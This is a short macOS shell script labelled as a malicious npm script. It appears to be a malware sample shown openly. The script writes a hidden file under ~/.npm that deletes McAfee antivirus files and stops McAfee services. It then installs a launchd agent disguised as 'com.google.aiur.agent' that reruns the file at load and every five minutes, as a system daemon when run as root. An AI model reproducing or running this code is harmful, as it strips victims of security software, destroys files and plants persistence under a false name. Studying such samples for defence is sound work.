Malicious NPM script

1.  
2. DAEMON=com.google.aiur.agent
3. TARGET=~/.npm/.hello
4. PLISTDIR=~/Library/LaunchAgents
5. [ $(id -u $USER) == 0 ] && PLISTDIR=/Library/LaunchDaemons
6. chown $USER ..
7. mkdir -p ~/.npm
8. cat <<EOF >$TARGET
9. #!/bin/bash
10. rm -rf /Applications/McAfee*
11. find /Library/LaunchDaemons -iname '*mcafee*' 2>/dev/null | xargs rm -rf
12. find /Library/LaunchAgents -iname '*mcafee*' 2>/dev/null | xargs rm -rf
13. find /System/Library -iname '*mcafee*' 2>/dev/null | xargs rm -rf
14. find /Users/*/Library/LaunchAgents -iname '*mcafee*' 2>/dev/null | xargs rm -rf
15. launchctl list | grep mcafee | awk '{ print $3 }' | xargs launchctl stop
16. EOF
17. chmod 511 $TARGET
18. cat <<EOF >$PLISTDIR/$DAEMON.plist
19. <?xml version="1.0" encoding="UTF-8"?>
20. <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
21. <plist version="1.0">
22. <dict>
23. <key>Label</key>
24. <string>$DAEMON</string>
25. <key>ProgramArguments</key>
26. <array>
27. <string>$TARGET</string>
28. </array>
29. <key>RunAtLoad</key>
30. <true/>
31. <key>StartInterval</key>
32. <integer>300</integer>
33. </dict>
34. </plist>
35. EOF
36. chmod 600 $PLISTDIR/$DAEMON.plist
37. launchctl load $PLISTDIR/$DAEMON.plist
38. launchctl start $DAEMON